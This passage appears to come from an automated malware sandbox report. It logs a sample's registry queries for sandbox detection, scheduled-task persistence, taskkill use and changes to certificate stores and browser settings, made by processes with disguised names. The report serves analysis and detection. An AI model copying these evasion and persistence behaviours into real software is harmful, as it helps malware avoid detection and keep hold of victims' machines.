Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 Esplorarne.exe.com Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI lV0cLJRjBoCNp3_nrE9Ro2WP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E Esplorarne.exe.com Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 Esplorarne.exe.com Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI GZCE7lNx2wr8c3GHhY6VpQGL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags Esplorarne.exe.com -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RUNDLL32.EXERUNDLL32.EXEsvchost.exeRUNDLL32.EXEWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comrundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3352 schtasks.exe 6308 schtasks.exe 2756 schtasks.exe 192 schtasks.exe 5484 schtasks.exe 4480 schtasks.exe 5096 schtasks.exe 5240 schtasks.exe 6008 schtasks.exe 7940 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 5724 timeout.exe 8860 timeout.exe 5992 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3792 taskkill.exe 4076 taskkill.exe 4740 taskkill.exe 4620 taskkill.exe 6360 taskkill.exe 4572 taskkill.exe 5796 taskkill.exe -
Modifies Control Panel 2 IoCs
Processes:
Esplorarne.exe.comEsplorarne.exe.comdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Colors Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Colors Esplorarne.exe.com -
Processes:
rundll32.exeEsplorarne.exe.comEsplorarne.exe.combrowser_broker.exeMicrosoftEdge.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.combrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\TypedURLs rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exe9NeY7wDiJGhrvsW_GspXT3lp.exeEsplorarne.exe.comEsplorarne.exe.comsvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 9NeY7wDiJGhrvsW_GspXT3lp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" 9NeY7wDiJGhrvsW_GspXT3lp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created 